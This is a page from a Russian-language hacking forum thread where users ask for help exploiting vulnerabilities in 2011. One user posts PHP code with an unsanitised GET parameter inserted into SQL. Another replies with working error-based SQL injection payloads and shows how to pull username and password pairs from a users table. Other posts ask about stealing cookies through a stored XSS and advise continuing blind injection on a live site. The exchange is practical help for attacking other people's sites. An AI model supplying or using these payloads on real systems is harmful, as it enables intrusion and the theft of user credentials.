HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1601 из 2422 « Первая < 6011101150115511591 1597 1598 1599 1600 1601 1602 1603 1604 1605 1611165117012101 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.02.2011, 10:47
Dare
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979

Репутация: 53
Отправить сообщение для Dare с помощью ICQ
По умолчанию
Да шанс есть, попробуй крутить как слепую.
 
Ответить с цитированием

  #2  
Старый 12.02.2011, 17:14
boortyhuhtyu
Guest
Сообщений: n/a
Провел на форуме:
225312

Репутация: -6
По умолчанию
.......

Цитата:
Сообщение от None  
Доступ к денверу из локалки
 
Ответить с цитированием

  #3  
Старый 12.02.2011, 17:28
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию
Цитата:
Сообщение от boortyhuhtyu  
boortyhuhtyu said:
есть сайт в локальной сети и есть активная xss можно ли перехватывать куки с локального хостинга например денвер и какие ещё есьт варианты?
Доступ к денверу из локалки
 
Ответить с цитированием

  #4  
Старый 13.02.2011, 14:36
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию
Есть sql injection. трабла в том что в скрипте 2 запросы к бд. Если ставить "union+select+1" то ошибка "the used select statements have a different nubmer of columns", a если ставить "union+select+1,2,3.." то такая же ошибка только теперь у первого запроса.

Вот код:

Код:
Code:
$requestid = $_GET[requestid];

$res2 = mysql_query("select count(addedrequests.id) from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid") or die(mysql_error());
$row = mysql_fetch_array($res2);
$count = $row[0];

$res = mysql_query("select users.id as userid,users.username, users.downloaded,users.uploaded, requests.id as requestid, requests.request from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid $limit") or sqlerr();
 
Ответить с цитированием

  #5  
Старый 13.02.2011, 14:40
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Вывод через ошибку:

(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--

либо так (select*from(select name_const(version(),1),name_const(version(),1))a)
 
Ответить с цитированием

  #6  
Старый 13.02.2011, 14:52
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию
спасибки, работало, но как можно например не "from information_schema.tables" a "from users where id='1'"?
 
Ответить с цитированием

  #7  
Старый 13.02.2011, 15:00
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
вместо version() прописываешь например (select concat(username,0x3a,password) from users limit 0,1)
 
Ответить с цитированием

  #8  
Старый 13.02.2011, 15:32
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию
спасибо. но есть еше такой;

list.php?page=444444444444444444444444444444444

Код:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.66666666667E+33,15' at line 1
можно что-то замутить или иреально?
 
Ответить с цитированием

  #9  
Старый 13.02.2011, 21:27
boortyhuhtyu
Guest
Сообщений: n/a
Провел на форуме:
225312

Репутация: -6
По умолчанию
что можно зделать с путями с открытыми на серваке?

/images/spacer.gif

/icons/

/mail/

/robots.txt

/webmail/

/changelog.txt
 
Ответить с цитированием

  #10  
Старый 13.02.2011, 21:28
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию
Цитата:
Сообщение от boortyhuhtyu  
boortyhuhtyu said:
что можно зделать с путями с открытыми на серваке?
/images/spacer.gif
/icons/
/mail/
/robots.txt
/webmail/
/changelog.txt
Ничего.

Цитата:
Сообщение от rootmd  
rootmd said:
спасибо. но есть еше такой;
list.php?page=444444444444444444444444444444444
Код:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.66666666667E+33,15' at line 1
можно что-то замутить или иреально?
Крути.
 
Ответить с цитированием
Ответ
Страница 1601 из 2422 « Первая < 6011101150115511591 1597 1598 1599 1600 1601 1602 1603 1604 1605 1611165117012101 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ